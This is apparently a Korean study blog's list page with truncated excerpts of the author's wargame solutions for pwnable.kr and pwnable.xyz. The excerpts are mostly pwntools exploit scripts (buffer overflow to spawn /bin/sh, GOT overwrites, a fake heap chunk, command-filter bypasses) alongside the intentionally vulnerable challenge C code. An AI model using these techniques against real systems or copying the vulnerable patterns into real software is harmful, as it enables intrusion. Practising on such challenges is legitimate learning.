대충공부한거적어두는블로그

#-*- coding:utf-8 -*- # SyntaxError: Non-ASCII character '\xeb' 발생하므로 맨 앞에 추가 from pwn import * # time expired 뜨네,, (인터넷 연결 문제?) # 이전에 썼던 pwnable.kr의 ssh 계정 하나 사용해서 내부에서 스크립트 실행해보자 # nc ip port = remote(IP, PORT) # s = ssh(user="shellshock", host="pwnable.kr", port=2222, password="guest") # p = s.remote("localhost", 9007) # 이래도 시간부족 -> 아예 /tmp 아래 폴더 하나 만들고 python 파일 만들어서 실행시키자 p = remote("localh..

#include #include int filter(char* cmd){ int r=0; r += strstr(cmd, "=")!=0; r += strstr(cmd, "PATH")!=0; r += strstr(cmd, "export")!=0; r += strstr(cmd, "/")!=0; r += strstr(cmd, "`")!=0; r += strstr(cmd, "flag")!=0; return r; } extern char** environ; void delete_env(){ char** p; for(p=environ; *p; p++) memset(*p, 0, strlen(*p)); } int main(int argc, char* argv[], char** envp){ delete_env(); put..

#include #include int filter(char* cmd){ int r=0; r += strstr(cmd, "flag")!=0; r += strstr(cmd, "sh")!=0; r += strstr(cmd, "tmp")!=0; return r; } int main(int argc, char* argv[], char** envp){ putenv("PATH=/thankyouverymuch"); if(filter(argv[1])) return 0; system( argv[1] ); return 0; } PATH 환경변수 - 명령을 찾기 위해 검색할 디렉토리 지정 putenv("PATH=/~") // 기존 PATH 환경변수를 덮어씀! -> cat 명령어 쓰려면 /bin/cat 이렇게 명령어 위치 절..

from pwn import * p = remote("pwnable.kr", 9000) pay = b'A'*(0x2c+0x8)+p32(0xcafebabe) p.sendline(pay) p.interactive() #include #include #include void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe){ system("/bin/sh"); } else{ printf("Nah..\n"); } } int main(int argc, char* argv[]){ func(0xdeadbeef); return 0; } // bof: partial R..

#include #include #include #include char flag[100]; char password[100]; char* key = "3\rG[S/%\x1c\x1d#0?\rIS\x0f\x1c\x1d\x18;,4\x1b\x00\x1bp;5\x0b\x1b\x08\x45+"; void calc_flag(char* s){ int i; for(i=0; i

from pwn import * p = remote("pwnable.kr", 9026) flg_name = 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong' context(arch="amd64", os="linux") # context(arch="i386", os="linux") for 32bit payload = b'' # payload +..

from pwn import * # context.log_level = 'debug' p = remote("svc.pwnable.xyz", 30005) # p = process("./challenge") # pwndbg 터미널 열리면 거기서 bp 세팅하고 c 입력 후 원래 터미널에서 아무키나 입력 (동적분석!!!!) # 그러면 파이썬 코드 실행되고 bp에서 멈출 것. free() 근처에서 분석하자 # gdb.attach(p) # pause() win = 0x400a3e # 위치 안변하고, write 가능한 바이너리의 .data영역 (0x601000~0x602000)에 fake_chunk 만들자 # 0x601010, 0x601020 에는 stdin,stdout 관련 데이터 들어있으므로 0x601030 부터..

from pwn import * p = remote("svc.pwnable.xyz", 30029) v6 = int(0xAC8-0x202200)//8 # -262887 v4 = 0x458B48FFFFFF54E8 ^ 0x1 # 5011179274728592617 v5 = 0x1 # (a^b)^b = a p.sendline(str(int(v4))+" "+str(int(v5))+" "+str(int(v6))) p.recvline() p.sendline("1 2 10") p.interactive() int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // [rsp+Ch] [rbp-24h] __int64 v4; /..

from pwn import * p = remote("svc.pwnable.xyz", 30031) printf_got = 0x603038 # overwrite 시점에 이미 사용된 함수 (printf,scanf,atoi,read) puts_got = 0x603020 # \x20 = space, scanf 함수는 공백/줄바꿈 만나면 입력 멈춤 strncmp_got = 0x603018 win = 0x40099c p.sendafter("> ", "2") # 문자 입력하는 것이므로 little endian 형식으로 주어야함 # 배열 앞에서부터 한바이트씩 채워짐 p.sendafter("nationality: ", b'A'*0x10+p64(strncmp_got)) p.sendafter("> ", "3") p.send..

from pwn import * p = remote("svc.pwnable.xyz", 30016) e = ELF("./challenge") # 둘 다 됨 (ELF.got으로 구해도 되고 gdb로 구해도 되고~) read_got = 0x601248 printf_got = e.got['printf'] # 0x601238 puts_got = 0x601220 win = 0x40093c p.sendafter("> ", "1") p.sendafter("len? ", "40") p.sendafter("note: ", b'A'*0x20+p64(printf_got)) p.sendafter("> ", "2") p.sendafter("desc: ", p64(win)) p.interactive() int __cdecl mai..